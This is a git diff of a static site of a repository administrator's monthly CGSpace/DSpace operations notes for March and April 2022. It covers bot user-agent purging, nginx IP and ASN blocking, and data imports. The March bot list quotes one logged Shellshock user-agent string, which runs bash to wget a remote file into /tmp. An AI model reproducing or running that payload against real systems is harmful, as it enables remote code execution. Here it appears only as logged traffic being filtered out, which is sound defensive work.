March, 2022
+April, 2022
2022-03-01
+2022-04-01
-
-
- Send Gaia the last batch of potential duplicates for items 701 to 980: -
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
-$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
-$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
-$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
-
2022-03-04
+-
-
- Looking over the CGSpace Solr statistics from 2022-02
-
-
-
- I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more! -
- Here are some of the more prevalent or weird ones:
-
-
-
- axios/0.21.1 -
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com) -
- Nutraspace/Nutch-1.2 (www.nutraspace.com) -
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com) -
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com -
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/) -
- Crowsnest/0.5 (+http://www.crowsnest.tv/) -
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com -
- metha/0.2.27 -
- ZaloPC-win32-24v454 -
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x -
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org) -
- FullStoryBot/1.0 (+https://www.fullstory.com) -
- Link Validity Check From: http://www.usgs.gov -
- OSPScraper (+https://www.opensyllabusproject.org) -
- () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832" -
- - I submitted a pull request to COUNTER-Robots with some of these -
- - I purged a bunch of hits from the stats using the
check-spider-hits.sh
script:
-
]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
-Purging 6 hits from scalaj-http in statistics
-Purging 5 hits from lua-resty-http in statistics
-Purging 9 hits from AHC in statistics
-Purging 7 hits from acebookexternalhit in statistics
-Purging 1011 hits from axios\/[0-9] in statistics
-Purging 2216 hits from Faveeo\/[0-9] in statistics
-Purging 1164 hits from Moreover\/[0-9] in statistics
-Purging 740 hits from Exploratodo\/[0-9] in statistics
-Purging 585 hits from GroupHigh\/[0-9] in statistics
-Purging 438 hits from Crowsnest\/[0-9] in statistics
-Purging 1326 hits from nbertaupete95 in statistics
-Purging 182 hits from metha\/[0-9] in statistics
-Purging 68 hits from ZaloPC-win32-24v454 in statistics
-Purging 1644 hits from Firefox\/x\.x in statistics
-Purging 678 hits from ZoteroTranslationServer in statistics
-Purging 27 hits from FullStoryBot in statistics
-Purging 26 hits from Link Validity Check in statistics
-Purging 26 hits from OSPScraper in statistics
-Purging 1 hits from 3137382e37392e3138372e313832 in statistics
-Purging 2755 hits from Nutch-[0-9] in statistics
-
-Total number of bot hits purged: 12914
-
-
-
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project -
2022-03-05
--
-
- Start AReS harvest -
2022-03-10
--
-
- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)
-
-
-
- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL: +
- The Discovery indexing took this long:
or(
-isNotNull(value.match('707')),
-isNotNull(value.match('709')),
-isNotNull(value.match('710')),
-isNotNull(value.match('711')),
-isNotNull(value.match('713')),
-isNotNull(value.match('717')),
-isNotNull(value.match('718')),
-...
-isNotNull(value.match('821'))
-)
-
-
-
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test: -
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
-
2022-03-12
+real 334m33.625s
+user 227m51.331s
+sys 3m43.037s
+
2022-04-04
-
-
- Update all containers and rebuild OpenRXV on linode20: -
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
-$ docker-compose build
-
-
-
- Then run all system updates and reboot
- Start a full harvest on AReS -
2022-03-16
+-
-
- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
-
-
-
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing +
- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent:
Apache-HttpClient/4.5.9 (Java/1.8.0_322)
, and many others with a normal browser agent, so that’s fishy!
+ - The DSpace agent pattern
http.?agent
seems to have caught the first ones, but I’ll purge the IP ones
+ - I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for
dns:*msnbot* AND dns:*.msn.com.
I see over 100,000, which is a problem I noticed a few months ago too…
+ - I extracted the MSN Bot IPs from Solr using an IP facet, then used the
check-spider-ip-hits.sh
script to purge them
2022-03-20
+2022-04-10
- Start a full harvest on AReS
2022-03-21
+2022-04-13
-
-
- Review a few submissions for Open Repositories 2022 -
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed -
2022-03-22
+-
-
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
-
-
-
- I had been meaning to update my local database… -
- - I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails: -
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
-$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
-
-
-
- On my local environment I decided to run the
check-duplicates.py
script one more time with all 700 items:
-
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
-$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
-$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
-$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
-
-
-
- I sent the resulting 76 items to Gaia to check -
- UptimeRobot said that CGSpace was down
-
-
-
- I looked and found many locks belonging to the REST API application: +
- I looked and found the load at 44…
+ - There seem to be a lot of locks from the XMLUI:
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
- 301 dspaceWeb
- 2390 dspaceApi
+ 3173 dspaceWeb
-
-
- Looking at nginx’s logs, I found the top addresses making requests today: +
- Looking at the top IPs in nginx’s access log one IP in particular stands out:
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
- 1977 45.5.184.2
- 3167 70.32.90.172
- 4754 54.195.118.125
- 5411 205.186.128.185
- 6826 137.184.159.211
+ 941 66.249.66.222
+ 1224 95.108.213.28
+ 2074 157.90.209.76
+ 3064 66.249.66.221
+ 95743 185.192.69.15
-- 137.184.159.211 is on DigitalOcean using this user agent:
GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28
-
-- I blocked this IP in nginx and the load went down immediately
+- 185.192.69.15 is in the UK
+- I added a block for that IP in nginx and the load went down…
-
-- 205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot
-- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
-- 70.32.90.172 is on Media Temple and has no user agent
-- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
+
2022-04-16
-- I verified it works as expected with an empty user agent:
+- Start harvest on AReS
+
+2022-04-18
+
+- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)
+
+- I see there are many locks in use from the XMLUI:
-$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
-Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+ 8932 dspaceWeb
-- I note that the nginx log shows ‘-’ for a request with an empty user agent, which would be indistinguishable from a request with a ‘-’, for example these were successful:
+- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
-70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
-70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
+ 752 69.162.124.231
+ 759 66.249.64.213
+ 864 66.249.66.222
+ 905 2a01:4f8:221:f::2
+ 1013 84.33.2.97
+ 1201 157.55.39.159
+ 1204 157.55.39.144
+ 1209 157.55.39.102
+ 1217 157.55.39.161
+ 1252 207.46.13.177
+ 1274 157.55.39.162
+ 2553 66.249.66.221
+ 2941 95.108.213.28
-- I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too
-- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that
+- One IP is using a stange user agent though:
-2022-03-24
-
-- Maria from ABC asked about a reporting discrepancy on AReS
-
-- I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week
-
-
-- Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
-
-- She asked if we can download them and upload them directly to CGSpace
-
-
-- I re-created my local Artifactory container
-- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
-
-- One thing I realized is that OAI is no longer a standalone web application, it is part of the
server
app now: http://localhost:8080/server/oai/request?verb=Identify
-
-
-- Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active
-
-- I did this on DSpace Test in 2022-02 so I just followed the same procedure
-- After that I ran all system updates and rebooted the server
-
-
-
-2022-03-25
-
-- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
-
-
-
-- The space saving in indexes of recent PostgreSQL releases is awesome!
-- Import a DSpace 6.x database dump from production into my local DSpace 7 database
-
-- I see I still the same errors I saw in 2021-04 when testing DSpace 7.0 beta 5
-- I had to delete some old migrations, as well as all Atmire ones first:
-
-
-
-localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
-localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%'
+84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
-- Then I was able to migrate to DSpace 7 with
dspace database migrate ignored
as the DSpace upgrade notes say
+ - Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+17314
+
+- That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
-- I see that the flash of unstyled content bug still exists on dspace-angluar… ouch!
+- The ISPs I’ve seen so far are ChinaNet and China Unicom
+- I extracted all the IPs from today and resolved them:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
+$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
+
+- The top ASNs by IP are:
+
+$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+ 102 GOOGLE
+ 139 Maxihost LTDA
+ 165 AMAZON-02
+ 393 "China Mobile Communications Group Co., Ltd."
+ 473 AMAZON-AES
+ 616 China Mobile communications corporation
+ 642 M247 Ltd
+ 2336 HostRoyale Technologies Pvt Ltd
+ 4556 Chinanet
+ 5527 CHINA UNICOM China169 Backbone
+$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
+ 139 262287
+ 165 16509
+ 180 204287
+ 393 9808
+ 473 14618
+ 615 56041
+ 642 9009
+ 2156 203020
+ 4556 4134
+ 5527 4837
+
+- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
+- I will download the IP blocks for each ASN except Google and Amazon and ban them
+
+$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
+20296
+
+- I extracted the IPv4 and IPv6 networks:
+
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
+$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
+
+- I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:
+
+$ wc -l /tmp/ipv4-networks.txt
+15464 /tmp/ipv4-networks.txt
+$ aggregate6 /tmp/ipv4-networks.txt | wc -l
+2781
+$ wc -l /tmp/ipv6-networks.txt
+4833 /tmp/ipv6-networks.txt
+$ aggregate6 /tmp/ipv6-networks.txt | wc -l
+338
+
+- I deployed these lists on CGSpace, ran all updates, and rebooted the server
+
+- This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?
+- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
+
+
+- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
+
+
+
+
+- I used
grepcidr
with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
+
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
+# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
+# wc -l /tmp/ipv4-ips.txt
+15313 /tmp/ipv4-ips.txt
+# wc -l /tmp/ipv6-ips.txt
+19 /tmp/ipv6-ips.txt
+
+- Then I purged them from Solr using the
check-spider-ip-hits.sh
:
+
+$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
+
2022-04-23
+
+- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the
example
file that contains most patterns
+
+- I updated CGSpace, then ran all system updates and rebooted the host
+- I also ran
dspace cleanup -v
to prune the database
+
+
+
+2022-04-24
+
- Start a harvest on AReS
-2022-03-26
-
-- Update dspace-statistics-api to Falcon 3.1.0 and release v1.4.3
-
-2022-03-28
-
-- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
-
-$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
-
-- I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
-
-- According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
-
-
-- Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”
-
-- We asked Peter and he said we should delete them
-- I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them
-
-
-- I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
-
-- I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansble infrastructure playbooks
-
-
-
-2022-03-29
-
-- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
-
-- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
-
-
-
-or(
-isNotNull(value.match('33')),
-isNotNull(value.match('179')),
-isNotNull(value.match('452')),
-isNotNull(value.match('489')),
-isNotNull(value.match('541')),
-isNotNull(value.match('568')),
-isNotNull(value.match('646')),
-isNotNull(value.match('889'))
-)
-
-- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
-
-$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
-$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
-$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
-
-- After that I did some normalization on the
cg.subject.system
metadata and extracted a few dozen countries to the country field
-- Start a harvest on AReS
-
-2022-03-30
-
-- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
-
-$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
-
-- I started looking into the request regarding the CIAT Library PDFs
-
-- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
-- The links seem to be down though! I emailed Paola to ask
-
-
-
-2022-03-31
-
-- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
-- I will do the following for CMS and G1GC on DSpace Test:
-
-- Wait for startup
-- Reload home page
-- Log in
-- Do a search for “livestock”
-- Click AGROVOC facet for livestock
-- dspace index-discovery -b
-- dspace-statistics-api index
-
-
-- With CMS the Discovery Index took:
-
-real 379m19.245s
-user 267m17.704s
-sys 4m2.937s
-
-- Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
-
-- I extracted a list of URLs from CGSpace to send him:
-
-
-
-localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
-COPY 4552
-
-- I did some checks and cleanups in OpenRefine because there are some values with “#page” etc
-
-- Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs
-- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
-
-
-
+
diff --git a/docs/categories/index.html b/docs/categories/index.html
index 44a1ddd38..ad1ecf36d 100644
--- a/docs/categories/index.html
+++ b/docs/categories/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/categories/notes/index.html b/docs/categories/notes/index.html
index 87dd37af7..fbc2e88e6 100644
--- a/docs/categories/notes/index.html
+++ b/docs/categories/notes/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/categories/notes/page/2/index.html b/docs/categories/notes/page/2/index.html
index f3aca378b..28eae9ae2 100644
--- a/docs/categories/notes/page/2/index.html
+++ b/docs/categories/notes/page/2/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html
index 2472db177..ac3f12f7c 100644
--- a/docs/categories/notes/page/3/index.html
+++ b/docs/categories/notes/page/3/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html
index 27f94ab2d..898bdc59a 100644
--- a/docs/categories/notes/page/4/index.html
+++ b/docs/categories/notes/page/4/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html
index 1e4c8d03b..5ef8ca553 100644
--- a/docs/categories/notes/page/5/index.html
+++ b/docs/categories/notes/page/5/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html
index 24f0b3cec..50aca7d18 100644
--- a/docs/categories/notes/page/6/index.html
+++ b/docs/categories/notes/page/6/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/index.html b/docs/index.html
index 69c350c1b..831866982 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/2/index.html b/docs/page/2/index.html
index aca08861b..a5e9978d0 100644
--- a/docs/page/2/index.html
+++ b/docs/page/2/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/3/index.html b/docs/page/3/index.html
index 51550018f..a1bc13a4c 100644
--- a/docs/page/3/index.html
+++ b/docs/page/3/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/4/index.html b/docs/page/4/index.html
index b9227a455..f4ca29552 100644
--- a/docs/page/4/index.html
+++ b/docs/page/4/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/5/index.html b/docs/page/5/index.html
index d75b2194b..b4e25c70e 100644
--- a/docs/page/5/index.html
+++ b/docs/page/5/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/6/index.html b/docs/page/6/index.html
index b866a911f..2ca891192 100644
--- a/docs/page/6/index.html
+++ b/docs/page/6/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/7/index.html b/docs/page/7/index.html
index e999bb37c..0ff9b3e10 100644
--- a/docs/page/7/index.html
+++ b/docs/page/7/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/8/index.html b/docs/page/8/index.html
index a684c8e20..a9acc7528 100644
--- a/docs/page/8/index.html
+++ b/docs/page/8/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/page/9/index.html b/docs/page/9/index.html
index f4c1f683e..7113d7e6d 100644
--- a/docs/page/9/index.html
+++ b/docs/page/9/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/index.html b/docs/posts/index.html
index 00ee79cbc..4310e3256 100644
--- a/docs/posts/index.html
+++ b/docs/posts/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html
index 3376ba8c6..9b0f062fa 100644
--- a/docs/posts/page/2/index.html
+++ b/docs/posts/page/2/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/3/index.html b/docs/posts/page/3/index.html
index c1dbb0699..76f03d75a 100644
--- a/docs/posts/page/3/index.html
+++ b/docs/posts/page/3/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/4/index.html b/docs/posts/page/4/index.html
index b1e213438..26894ca1c 100644
--- a/docs/posts/page/4/index.html
+++ b/docs/posts/page/4/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/5/index.html b/docs/posts/page/5/index.html
index db91bff86..59fdb2f71 100644
--- a/docs/posts/page/5/index.html
+++ b/docs/posts/page/5/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/6/index.html b/docs/posts/page/6/index.html
index a1c40d3c5..1a4948131 100644
--- a/docs/posts/page/6/index.html
+++ b/docs/posts/page/6/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html
index ff94c5ef0..148650f6c 100644
--- a/docs/posts/page/7/index.html
+++ b/docs/posts/page/7/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html
index fc55d3531..9a4f4002b 100644
--- a/docs/posts/page/8/index.html
+++ b/docs/posts/page/8/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/posts/page/9/index.html b/docs/posts/page/9/index.html
index 0db04154a..308acb033 100644
--- a/docs/posts/page/9/index.html
+++ b/docs/posts/page/9/index.html
@@ -10,7 +10,7 @@
-
+
diff --git a/docs/sitemap.xml b/docs/sitemap.xml
index e8a40feb7..7f161bf9b 100644
--- a/docs/sitemap.xml
+++ b/docs/sitemap.xml
@@ -3,22 +3,22 @@
xmlns:xhtml="http://www.w3.org/1999/xhtml">
https://alanorth.github.io/cgspace-notes/categories/
- 2022-04-18T21:43:48+03:00
+ 2022-04-23T13:05:02+03:00
https://alanorth.github.io/cgspace-notes/
- 2022-04-18T21:43:48+03:00
+ 2022-04-23T13:05:02+03:00
https://alanorth.github.io/cgspace-notes/2022-03/
2022-04-04T19:15:58+03:00
https://alanorth.github.io/cgspace-notes/categories/notes/
- 2022-04-18T21:43:48+03:00
+ 2022-04-23T13:05:02+03:00
https://alanorth.github.io/cgspace-notes/posts/
- 2022-04-18T21:43:48+03:00
+ 2022-04-23T13:05:02+03:00
https://alanorth.github.io/cgspace-notes/2022-03/
- 2022-04-18T21:43:48+03:00
+ 2022-04-23T13:05:02+03:00
https://alanorth.github.io/cgspace-notes/2022-02/
2022-03-01T17:17:27+03:00